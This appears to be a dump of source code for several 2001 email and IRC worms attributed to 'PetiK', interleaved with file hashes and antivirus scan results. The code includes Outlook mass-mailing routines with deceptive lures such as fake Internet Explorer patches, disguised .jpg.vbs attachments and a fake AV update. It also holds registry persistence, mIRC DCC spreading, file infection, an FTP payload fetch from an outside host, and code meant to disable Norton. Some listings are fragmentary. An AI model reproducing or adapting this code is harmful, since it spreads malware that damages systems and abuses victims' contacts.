inifile db "C:\script.ini",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
Winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
yahoo db "http://www.yahoo.fr",00h
SOUS_CLE db "Control Panel\Desktop",00h
TWP_D db "TileWallpaper",00h
TWP_S db "0",00h
WPS_D db "WallpaperStyle",00h
WPS_S db "2",00h
FICHIER db "*.bmp",00h
inid: db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick "
szCopie db 260 dup (0)
db "",0dh,0ah
db "n3=}",00h
INITAILLE equ $-inid
vbsd:
db 'Dim fso,ws,file',0dh,0ah
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'EMAIL()',0dh,0ah
db 'End Sub',0dh,0ah
db 'Sub EMAIL()',0dh,0ah
db 'Set OApp=CreateObject("Outlook.Application")',0dh,0ah
db 'If OApp="Outlook" Then',0dh,0ah
db 'Set Mapi = OApp.GetNameSpace("MAPI")',0dh,0ah
db 'For Each AddList In Mapi.AddressLists',0dh,0ah
db 'If AddList.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For AddListCount = 1 To AddList.AddressEntries.Count',0dh,0ah
db 'Set AddListEntry = AddList.AddressEntries(AddListCount)',0dh,0ah
db 'Set msg = OApp.CreateItem(0)',0dh,0ah
db 'msg.To = AddListEntry.Address',0dh,0ah
db 'msg.Subject = "The last patch for Internet Explorer"',0dh,0ah
db 'm = "Date : " & date',0dh,0ah
db 'm = m & vbCrLf & "A lot of virus and worms use a bug in Internet Explorer"',0dh,0ah
db 'm = m & vbCrLf & "This patch allows you to correct this problem"',0dh,0ah
db 'm = m & vbCrLf & ""',0dh,0ah
db 'msg.Body = m',0dh,0ah
db 'msg.Attachments.Add fso.BuildPath(fso.GetSpecialFolder(1),"\ie042601.exe")',0dh,0ah
db 'If msg.To <> "" Then',0dh,0ah
db 'msg.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End if',0dh,0ah
db 'End Sub',0dh,0ah
VBSTAILLE equ $-vbsd
batd:
db "@echo off",0dh,0ah
db "if exist C:\WINDOWS\EMail.vbs start C:\WINDOWS\EMail.vbs",0dh,0ah
db "if exist C:\WINDOW\EMail.vbs start C:\WINDOW\EMail.vbs",0dh,0ah
db "if exist C:\WIN\EMail.vbs start C:\WIN\EMail.vbs",0dh,0ah
db "if exist C:\WIN95\EMail.vbs start C:\WIN95\EMail.vbs",0dh,0ah
db "if exist C:\WIN98\EMail.vbs start C:\WIN98\EMail.vbs",0dh,0ah
db "if exist C:\WINDOWS.000\EMail.vbs start C:\WINDOWS.000\EMail.vbs",0dh,0ah
db "if exist C:\WINDOWS.001\EMail.vbs start C:\WINDOWS.001\EMail.vbs",0dh,0ah
db "start ftp -i -v -s:C:\Win.drv",00h
BATTAILLE equ $-batd
drvd:
db "open",0dh,0ah
db "members.aol.com",0dh,0ah
db "pentasm99",0dh,0ah
db "lcd C:\",0dh,0ah
db "bin",0dh,0ah
db "get petik.bmp",0dh,0ah
db "bye",0dh,0ah
db "exit",00h
DRVTAILLE equ $-drvd
.code
DEBUT:
CACHE: call GetCurrentProcessId ; Ceci permet de cacher le programme
push 01h ; dans la liste des tâches.
push eax ; (CTRL+ALT+SUPR)
call RegisterServiceProcess ;
push 02h ;
push offset WPS_D ;
push offset REG_SZ ;
push 00h ;
push offset WPS_S ;
push [RegHandle] ;
call RegSetValueExA ;
push 00h ;
call RegCloseKey ;
signature db "I-WORM.PetiK",00h
end DEBUT
File PetiK.exe received on 05.16.2009 19:29:07 (CET)
Additional information
File size: 8192 bytes
MD5...: 61ed2fc0c60eac81856e07055621b5aa
SHA1..: f172dd91c6e866ad0dfdafd9ea8d6412cf66c42e
' Name : VBS.Study
' Author : PetiK
' Language : VBS
' Date : 15/02/2001
If num = 1 Then
c.Copy(fso.GetSpecialFolder(0)&"\MyGirlfriend_NUDE.jpg.vbs")
msg.Subject = "Hi, how are you ?"
msg.Body = "Hi, look at this nice Pic attached !"
msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"MyGirlfriend_NUDE.jpg.vbs")
Additional information
File size: 2033 bytes
MD5...: f41a964a3cb2ad29bcee1ce95163c7a9
SHA1..: 5b003c80a78b61e702f80e83bb77cffff4678d8b
;Bastille Virus/Worm par PetiK le 23/04/2001
.model small
.code
org 100h
DEBUT:
OUVRE_AUTO:
mov ax,3D01h
lea dx,FILE
int 21h
xchg ax,bx
xor cx,cx
mov dx,cx
mov ax,4202h
int 21h
mov cx,AUTOL
lea dx,DAUTO
mov ah,40h
int 21h
mov ah,3Eh
int 21h
COPIE_VIRUS:
mov ah,3Ch
xor cx,cx
lea dx,COPIE
int 21h
xchg ax,bx
mov ah,40h
mov cx,offset VRAIFIN - offset DEBUT
lea dx,DEBUT
int 21h
mov ah,3Eh
int 21h
mov cx,MIRCL
lea dx,DMIRC
mov ah,40h
int 21h
mov ah,3Eh
int 21h
mov ah,41h
mov dx,offset MIRCF2
int 21h
mov ah,56h
mov dx,offset MIRCF1
mov di,offset MIRCF2
int 21h
mov ah,41h
mov dx,offset MIRCF1
int 21h
DATE: mov ah,2Bh
int 21h
mov dh,7
mov dl,14
mov cx,2001
int 21h
FILE db 'C:\Autoexec.bat',00h
MIRCF1 db 'C:\script.ini',00h
MIRCF2 db 'C:\mirc\script.ini',00h
COPIE db 'C:\Win32.com',00h
WHO db 'Bastille Virus/Worm by PetiK (c)2001',00h
DAUTO: db '',0dh,0ah
db '@echo off',0dh,0ah
db 'cls',0dh,0ah
db 'echo You''re infected by Bastille Virus (c)2001',0dh,0ah
db 'echo.',0dh,0ah
db 'echo Don''t panic ! It''s not dangerous, just fatal !!',0dh,0ah
db 'pause'
AUTOL equ $-DAUTO
DMIRC db '[script]',0dh,0ah
db 'n0=on 1:start:{',0dh,0ah
db 'n1= .sreq ignore',0dh,0ah
db 'n2=}',0dh,0ah
db 'n3=on 1:connect:/rename C:\Win32.com C:\Bastille.com',0dh,0ah
db 'n4=on 1:join:#:{',0dh,0ah
db 'n5=if ($nick != $me) { dcc send $nick C:\Bastille.com }',0dh,0ah
db 'n6=}',0dh,0ah
db 'n7=on 1:disconnect:/rename C:\Bastille.com C:\Win32.com'
MIRCL equ $-DMIRC
VRAIFIN:
end DEBUT
File Bastille.com received on 05.16.2009 10:45:35 (CET)
Additional information
File size: 858 bytes
MD5...: d35715e97081f71ca4df20ad03bc0341
SHA1..: 2c3b51c4a6e0fb54c3ab66446dcce7d5ed61b5de
' Name : VBS.Starmania.A
' Author : PetiK
' Date : May 09th 2001
' Size : 4566 bytes
' Action : It copies itself to %windir%\Hwinfo.vbs and to %systemroot%\Issetup.vbs.
' It adds to values. The first in the Run key and the second in the RunServices
' key. Then it infects all *.vbs and *.vbe files in differents folder :
'
' C:\WINDOWS \
' C:\WINDOWS\SYSTEM |
' C:\WINDOWS\TEMP |_
' C:\WINDOWS\SAMPLES\WSH |- All those name are by default
' C:\WINDOWS\DEKTOP |
' C:\MY DOCUMENTS /
' The virus adds his code at the start of the file.
'
' After it creates a script.ini file to C:\mirc folder. When the current day is
' 15th, the worm displays a message, changes the RegisteredOwner and Registered-
' Organization by “Starmania” and “PetiK Corpor@tion” and adds some values to
' display a message when the computer start. It changes all days the Start Page
' of Internet Explorer between five differents adresses :
'
' http://www.symantec.com
' http://www.pandasoftware.com
' http://www.avp.ch
' http://www.cia.gov
' http://www.fbi.gov
'
' At the end, it spreads with Outlook. There are three differents subject, body
' and attachments :
'
'First : Subject : New Picture for you !
' Body : Look at this nice picture attached
' Attacged : NewPic__Cool.jpg.vbs
'
'Second : Subject : LoveLetter Fix
' Body : Protect you against VBS.LoveLetter.Variant
' Attacged : LoveFix.vbs
'
'Third : Subject : How to win a holiday in Paris
' Body : Play at this game attached and win a holiday in Paris
' Attacged : Win_A_Holiday.vbs
'
'VBS.Starmania
'Coded by PetiK on 09/05/2001
'Made In France
On Error Resume Next
Dim f,w,file
Set f=CreateObject("Scripting.FileSystemObject")
Set w=CreateObject("WScript.Shell")
Set file=f.OpenTextFile(WScript.ScriptFullName,1)
vbsworm=file.ReadAll
START()
Sub START()
Set win=f.GetSpecialFolder(0)
Set sys=f.GetSpecialFolder(1)
Set cop=f.GetFile(WScript.ScriptFullName)
cop.Copy(win&"\Hwinfo.vbs")
cop.Copy(sys&"\Issetup.vbs")
run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Hwinfo")
runs=("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Issetup")
w.RegWrite run,(win&"\Hwinfo.vbs")
w.RegWrite runs,(sys&"\Issetup.vbs")
MD=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Shell
Folders\Personal")
ptk(win)
ptk(sys)
ptk(f.GetSpecialFolder(2))
ptk(win&"\Samples\Wsh")
ptk(win&"\Desktop")
ptk(MD)
Worm ""
Mess()
Raffle()
Email()
End Sub
Function ptk(Folder)
If f.FolderExists(Folder) then
For each P in f.GetFolder(Folder).Files
ext=f.GetExtensionName(P.Name)
If ext="vbs" or ext="vbe" Then
Set VF=f.OpenTextFile(P.path, 1)
mark=VF.Read(14)
VF.Close
Set VF=f.OpenTextFile(P.path,2,True)
VF.Write VCd
VF.Close
End If
End If
Next
End If
End Function
Function Worm(Path)
If Path = "" Then
prgfl=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If f.FileExists("C:\mirc\mirc.ini") Then Path = "C:\mirc"
If f.FileExists(prgfl & "\mirc\mirc.ini") Then Path = prgfl & "\mirc"
If f.FileExists("C:\mirc32\mirc.ini") Then Path = "C:\mirc32"
If f.FileExists(prgfl & "\mirc32\mirc.ini") Then Path = prgfl & "\mirc32"
End If
If Path <> "" Then
Set mirc=f.CreateTextFile(Path & "\script.ini", True)
mirc.WriteLine "[script]"
mirc.WriteLine "n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt } "
mirc.WriteLine "n1= /dcc send $nick " & f.GetSpecialFolder(0) &"\Hwinfo.vbs"
mirc.WriteLine "n2=}"
End If
End Function
Sub Mess()
If Day(Now) = 15 Then
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\StarMania","rundll32
mouse,disable"
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","How
are you today ? For my part, I'm fine"
w.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","VBS.Starman
ia"
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner","Starmania"
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization","PetiK
Corpor@tion"
MsgBox "Hi man, it's my new Worm/Virus. It was coded by PetiK in 2001", vbinformation,
"VBS.Starmania"
End If
End Sub
Sub Raffle()
Randomize
lot=Int((5*Rnd)+1)
If lot = 1 Then
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.symantec.com"
elseif lot = 2 Then
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.pandasoftware.com"
elseif lot = 3 Then
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.avp.ch"
elseif lot = 4 Then
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.cia.gov"
elseif lot = 5 Then
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.fbi.gov"
End If
End Sub
Sub Email()
Set O=CreateObject("Outlook.Application")
Set mapi=O.GetNameSpace("MAPI")
For Each AL In mapi.AddressLists
If AL.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AL.AddressEntries.Count
Set ALE = AL.AddressEntries(AddListCount)
Set go = O.CreateItem(0)
go.To = ALE.Address
Randomize
num=Int((3*Rnd)+1)
Set c = f.GetFile(WScript.ScriptFullName)
If num = 1 then
c.Copy(fso.GetSpecialFolder(0)&"\NewPic__Cool.jpg.vbs")
go.Subject = "New Picture for you !"
go.Body = "Look at this nice picture attached"
go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"NewPic__Cool.jpg.vbs")
Additional information
File size: 4566 bytes
MD5...: db45536af4e9a1debccb73111fce3f3f
SHA1..: d8dfd047f7ccfba137bd3932c6495d7c0fc88d2e
<--
Name : HTML.Bother
Author : PetiK
Language : HTML/VBS
-->
<bother>
<html><head><title>Patch for Internet Explorer</title></head>
<body bgColor=#ffffff>
<font face='verdana' color=#ff0000 size='2'>You need ActiveX enabled if you want to see
this page.
<br>Please open this page again and click accept ActiveX.<br>Internet Explorer</font>
<SCRIPT Language=VBScript>
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
bureau=ws.RegRead
("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Desktop")
Set txt=fso.CreateTextFile(bureau&"\Hello.txt")
txt.WriteLine "HTML.Bother by PetiK (06/05/2001)"
txt.WriteLine "A HTML.Worm made in France"
txt.Close
p = Int(Rnd * 30) + 1
If Day(Now()) = p Then
WshShell.RegWrite
"HKEY_CLASSES_ROOT\htmlfile\DefaultIcon\",fso.GetSpecialFolder(1)&"\SHELL32.dll,69"
End If
doc=ws.RegRead
("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Personal")
Set FolderObj = FSO.GetFolder(doc)
Set FO = FolderObj.Files
For each cible in FO
ExtName = lcase(FSO.GetExtensionName(cible.Name))
if ExtName = "htm" or ExtName = "html" Then
Set vrai = fso.OpenTextFile(cible.path, 1, False)
if vrai.readline <> "<bother>" Then
vrai.close()
Set vrai = fso.OpenTextFile(cible.path, 1, False)
htmorg = vrai.ReadAll()
vrai.close()
Set virus = document.body.createTextRange
Set vrai = fso.CreateTextFile(cible.path, True, False)
vrai.WriteLine "<bother>"
vrai.Write(htmorg)
vrai.WriteLine "<bother par PetiK May 9th 2001>"
vrai.WriteLine virus.htmltext
vrai.Close()
else
Real.close()
end if
end if
next
</SCRIPT>
</body>
</html>
File Bother.htm received on 05.16.2009 11:20:32 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.VBS.Both!IK
AhnLab-V3 5.0.0.2 2009.05.15 HTML/Bother
AntiVir 7.9.0.168 2009.05.15 VBS/Both
Antiy-AVL 2.0.3.1 2009.05.15 Virus/VBS.VBS
Authentium 5.1.2.4 2009.05.15 VBS/Both.A
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Bother.A
BitDefender 7.2 2009.05.16 VBS.Both.A
CAT-QuickHeal 10.00 2009.05.15 VBS/Both.A
ClamAV 0.94.1 2009.05.15 VBS.Startpage-1
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Bother
eSafe 7.0.17.0 2009.05.14 Virus.VBS.Both
eTrust-Vet 31.6.6508 2009.05.16 VBS/Both
F-Prot 4.4.4.56 2009.05.15 VBS/Both.A
F-Secure 8.0.14470.0 2009.05.15 Virus.VBS.Both
Fortinet 3.117.0.0 2009.05.16 VBS/Both.A
GData 19 2009.05.16 VBS.Both.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.VBS.Both
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Both
McAfee 5616 2009.05.15 VBS/Bother
McAfee+Artemis 5616 2009.05.15 VBS/Bother
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Both
Microsoft 1.4602 2009.05.16 Virus:VBS/SYSID
NOD32 4080 2009.05.15 VBS/Bother
Norman 6.01.05 2009.05.16 VBS/Both.K
nProtect 2009.1.8.0 2009.05.16 VBS.Both.A
Panda 10.0.0.14 2009.05.15 Univ.A
PCTools 4.4.2.0 2009.05.15 VBS.Bother.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Script.HTML.Both
Sophos 4.41.0 2009.05.16 VBS/Bother
Sunbelt 3.2.1858.2 2009.05.16 Virus.VBS.Both (v)
Symantec 1.4.4.12 2009.05.16 VBS.Bother.3180
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 HTML_BOTHER.A
VBA32 3.12.10.5 2009.05.16 Virus.VBS.Both
ViRobot 2009.5.15.1737 2009.05.15 VBS.Both
VirusBuster 4.6.5.0 2009.05.15 VBS.Bother.A
Additional information
File size: 3255 bytes
MD5...: 915aaf9b61f0d62c1fc2082198b324be
SHA1..: e2bf913ffca85e796ecef0564a896625dc748332
comment #
Name : I-Worm.Friends
Author : PetiK
Date : May 13th - May 15th 2001
Action : This worm use a VBS script and Micosoft Outlook to spread. It copies itself to
\%SYSTEM%\Iesetup.exe. WIN.INI is modified with run=\%SYSTEM%\Iesetup.exe.
It creates a script file for mIRC in C:\mirc ans C:\mirc32.
It shows the first time a fake Winzip message box.
The worm creates C:\Friends and creates the file maya.vbs to spread.
It changes the values : HKLM\Software\Microsoft\Windows\CurrentVersion
RegisteredOwner : Maya, Laurent, Etienne
RegisteredOrganization : PetiK Corporation
On 5th of every month, it shows a message box.
.386
jumps
locals
.model flat,stdcall
;KERNEL32.dll
extrn WritePrivateProfileStringA:PROC
extrn lstrcat:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateDirectoryA:PROC
extrn CreateFileA:PROC
extrn ExitProcess:PROC
extrn CloseHandle:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetSystemTime:PROC
extrn GetWindowsDirectoryA:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
;USER32.dll
extrn MessageBoxA:PROC
;ADVAPI32.dll
extrn RegOpenKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
.data
szOrig db 50 dup (0)
szPTK db 50 dup (0)
szWin db 50 dup (0)
FileHandle dd ?
RegHandle dd ?
octets dd ?
winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
Copie db "\Iesetup.exe",00h
inifile db "\petik",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
VBS db "C:\Friends\maya.vbs",00h
DIR db "C:\Friends",00h
OWN_D db "RegisteredOwner",00h
OWN_S db "Maya, Laurent, Etienne",00h
ORG_D db "RegisteredOrganization",00h
ORG_S db "PetiK Corporation",00h
SOUS_CLE db "Software\Microsoft\Windows\CurrentVersion",00h
TITRE db "WinZip Self-Extractor",00h
TEXTE db "WinZip Self-Extractor header corrupt. Possible cause: bad disk or file
transfer error",00h
TITRE2 db "I-Worm.Friends",00h
TEXTE2 db "Coded by PetiK (c)2001",0dh,0ah
db "",0dh,0ah
db "To my friends Maya and Laurent",00h
email db "wscript C:\Friends\maya.vbs",00h
FILE_ATTRIBUTE_READONLY equ 00000001h
CREATE_NEW equ 00000001h
CREATE_ALWAYS equ 00000002h
FILE_SHARE_READ equ 00000001h
GENERIC_WRITE equ 40000000h
HKEY_LOCAL_MACHINE equ 80000002h
KEY_SET_VALUE equ 00000002h
REG_SZ equ 00000001h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wsecond WORD ?
wMilliseconds WORD ?
SYSTIME ends
SystemTime SYSTIME <>
petikd: db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick "
szCopie db 50 dup (0)
db "",0dh,0ah
db "n3=}",00h
PETIKTAILLE equ $-petikd
mayad:
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'fso.Copyfile fso.GetSpecialFolder(1)&"\Iesetup.exe",
fso.GetSpecialFolder(1)&"\NetFriends.exe"',0dh,0ah
db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Next',0dh,0ah
db 'Set N = K.CreateItem(0)',0dh,0ah
db 'N.Subject = "Would you like a Net Friend ?"',0dh,0ah
db 'N.Body = "Look at this zip file to find a Net Friend"',0dh,0ah
db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(1),"NetFriends.exe")',0dh,0ah
db 'If N.To <> "" Then',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
MAYATAILLE equ $-mayad
.code
DEBUT:
PREPAR: push 50
push offset szCopie
call GetSystemDirectoryA
push offset Copie
push offset szCopie
call lstrcat
FILE: push 50 ; Create PetiK in \%WINDIR%, a mIRC script
push offset szPTK
call GetWindowsDirectoryA
push offset inifile
push offset szPTK
call lstrcat
push 00h
push FILE_ATTRIBUTE_READONLY
push CREATE_NEW
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset szPTK ; success ? continue
call CreateFileA
cmp eax,-1
je BDR ; or else, jump to label BDR
mov [FileHandle],eax
push 00h
push offset octets
push PETIKTAILLE
push offset petikd
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle ; the file is create
push 02h
push offset OWN_D
push offset REG_SZ
push 00h
push offset OWN_S
push [RegHandle]
call RegSetValueExA ; Change the name of Registered Owner
push 02h
push offset ORG_D
push offset REG_SZ
push 00h
push offset ORG_S
push [RegHandle]
call RegSetValueExA ; Change the name of Registered Organization
push [RegHandle]
call RegCloseKey
end DEBUT
File Friends.exe received on 05.16.2009 11:58:15 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/PetTick.6656
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.15
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/Malware!543d
Avast 4.8.1335.0 2009.05.15 Win32:PetiK-Friends
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.B
BitDefender 7.2 2009.05.16 Generic.Malware.IM.34A9CFBA
CAT-QuickHeal 10.00 2009.05.15 W32.Petik.B
ClamAV 0.94.1 2009.05.15 W32.PetTick
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.6656
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.6656.A
F-Prot 4.4.4.56 2009.05.15 W32/Malware!543d
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/PetTick.B@mm
GData 19 2009.05.16 Generic.Malware.IM.34A9CFBA
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.15
Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.B
NOD32 4080 2009.05.15 Win32/Petik.B
Norman 6.01.05 2009.05.16 W32/Pet_Tick.6656.B
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.6656.C
Panda 10.0.0.14 2009.05.16 W32/Petik.B
PCTools 4.4.2.0 2009.05.15 VBS.LoveLetter
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.v
Sophos 4.41.0 2009.05.16 W32/Petik-B
Sunbelt 3.2.1858.2 2009.05.16 Friends worm
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.B
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.6656.A
VirusBuster 4.6.5.0 2009.05.15 VBS.LoveLetter
Additional information
File size: 6656 bytes
MD5...: 18651c3df28058b96d1297d1568d4fd8
SHA1..: b6689d3f64f47909b219b4a17fcae7c3f6567fd8
comment #
Name : I-Worm.Mustard
Author : PetiK
Date : May 10th - 27th
Size : 7168 bytes
Action : When the worm is first executed, it will create the key HKCU\Software\[PetiK].
After, it will copy itself as Windows\AVUpdate.exe. It alters the run= in the Win.ini
file to :
run=Windows\AVUpdate.exe. It will try to delete the value "Norton Auto-Protect" in the
Run key of registry. If it succeed, he alter "Exclude.dat" so that the VBS file don't
analyze by Norton Antivirus. It shows a message box and reboot the computer. Next start,
it will creates a VBS worm with the attributes "readonly" and "hidden".
On June 17th, it shows a message box.
.386
jumps
locals
.model flat,stdcall
extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn ExitWindowsEx:PROC
extrn GetFileAttributesA:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemTime:PROC
extrn GetWindowsDirectoryA:PROC
extrn lstrcat:PROC
extrn MessageBoxA:PROC
extrn RegCreateKeyExA:PROC
extrn RegOpenKeyExA:PROC
extrn RegDeleteValueA:PROC
extrn RegQueryValueExA:PROC
extrn RegCloseKey:PROC
extrn SetFileAttributesA:PROC
extrn SetFilePointer:PROC
extrn Sleep:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
extrn WritePrivateProfileStringA:PROC
.data
FileHandle dd ?
RegHandle dd ?
octets dd ?
regDisp dd 0
regResu dd 0
Dist dd 0
szNOR db 50 dup (0)
szOrig db 50 dup (0)
szWin db 50 dup (0)
Buffer db 7Fh dup (0)
BufferSize dd 7Fh
run db "run",00h
windows db "windows",00h
Winini db "\\WIN.INI",00h
Copie db "\AVUpdate.exe",00h
filedat db "\Exclude.dat",00h
email db "wscript C:\send.vbs",00h
VBS db "C:\send.vbs",00h
mirc db "C:\Win.sys",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\Program Files\mirc\script.ini",00h
script4 db "C:\Program Files\mirc32\script.ini",00h
CLE db "Software\[PetiK]",00h
TITRE db "Install Information",00h
TEXTE db "Please reboot your computer to finish the installation",00h
CLE_RUN db "Software\Microsoft\Windows\CurrentVersion\Run",00h
NAV db "Norton Auto-Protect",00h
CLE_NOR db "\Software\Symantec\InstalledApps",00h
ValueType dd 00h
Value db "NAV",00h
CREE db "I-Worm.Mustard par PetiK (c)2001",00h
TITRE2 db "I-Worm.Mustard",00h
TEXTE2 db " Coded By PetiK (c)2001 ",0dh,0ah
db "",0dh,0ah
db "Small but Pretty",0dh,0ah
db "I Love You",0dh,0ah
db "Since January",0dh,0ah
db "I Think Of You",00h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
SystemTime SYSTIME <>
mircd:
db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= ./dcc send $nick "
szCopie db 50 dup (0)
db "",0dh,0ah
db "n3=}",00h
MIRCTAILLE equ $-mircd
sendd:
db 'ENTREE()',0dh,0ah
db 'Sub ENTREE',0dh,0ah
db 'EMAIL()',0dh,0ah
db 'End Sub',0dh,0ah
db 'Sub EMAIL()',0dh,0ah
db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set N = K.CreateItem(0)',0dh,0ah
db 'N.To = P.Address',0dh,0ah
db 'N.Subject = "AntiVirus Update"',0dh,0ah
db 'N.Body = "The last version of your AV"',0dh,0ah
db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"AVUpdate.exe")',0dh,0ah
db 'N.DeleteAfterSubmit = True',0dh,0ah
db 'If N.To <> "" Then',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End Sub',0dh,0ah
SENDTAILLE equ $-sendd
datd:
db
02Ah,02Eh,076h,062h,073h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db
000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db
000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db
